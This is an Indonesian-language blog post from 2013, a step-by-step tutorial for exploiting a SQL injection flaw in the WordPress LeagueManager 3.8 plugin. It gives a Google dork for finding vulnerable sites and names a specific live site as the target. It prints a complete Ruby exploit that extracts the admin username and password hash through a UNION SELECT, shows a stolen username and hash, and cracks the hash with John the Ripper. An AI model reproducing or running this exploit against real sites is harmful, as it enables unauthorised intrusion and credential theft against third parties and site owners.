Minggu, 17 Maret 2013

WP LeagueManager Plugin v3.8 SQL Injection

Lama nggak nulis, hari ini pengen nulis lagi... tentang exploit dari Wordpress (exploit-db) :)

Yang perlu disiapkan =
  • Koneksi internet
  • Linux yg sudah terinstall Ruby
  • John the ripper
Kita mulai dengan buka Om google
Google Dork: inurl:"/wp-content/plugins/leaguemanager/"

Wow... target banyak amat... :)
saya ambil salah satu target = http://www.battlefield3chile.com
root@root:~# gedit /home/root/wp.rb
Paste kode berikut ini dan save
rrequire 'net/http'
require 'uri'

if ARGV.length == 2
    post_params = {
        'league_id' => '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,'\
        '9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--',
        'mode' => 'teams',
        'leaguemanager_export' => 'Download+File'
    }

    target_url = ARGV[0] + ARGV[1] + "/wp-admin/admin.php?page=leaguemanager-export"
   
    begin
        resp = Net::HTTP.post_form(URI.parse(target_url), post_params)
    rescue
        puts "Invalid URL..."
    end
       
    if resp.nil?
        print_error "No response received..."

    elsif resp.code != "200"
        puts "Page doesn't exist!"
    else
        admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/)
   
        if(admin_login.length > 0)
            puts "Username: #{admin_login[0][0]}"
            puts "Hash: #{admin_login[0][1]}"
            puts "\nNow go crack that with Hashcat :)"
        else
            puts "Username and hash not received. Maybe it's patched?"
        end
    end
else
    puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\""
end
Buka terminal
root@root:/home/root#  ruby ./wp.rb "http://www.battlefield3chile.com" "/"
Username: Danikin
Hash: $P$BQsalF8gfiIM.jjtmCgC8/3ma6A79U.
Now go crack that with Hashcat :)

Wow.. Username dan Password udah dapet..., tinggal dilanjutkan dengan crack Hash.. (banyak yg online), tapi disini kita akan coba gunakan John The Ripper
root@root:/pentest/passwords/john# john --wordlist=/home/root/word.lst --subformat=md5_gen\(17\) hash.txt
Okay.. ketemu hasilnya, tinggal login dan beritahu adminnya.



Artikel Terkait

0 komentar

Posting Komentar

Cancel Reply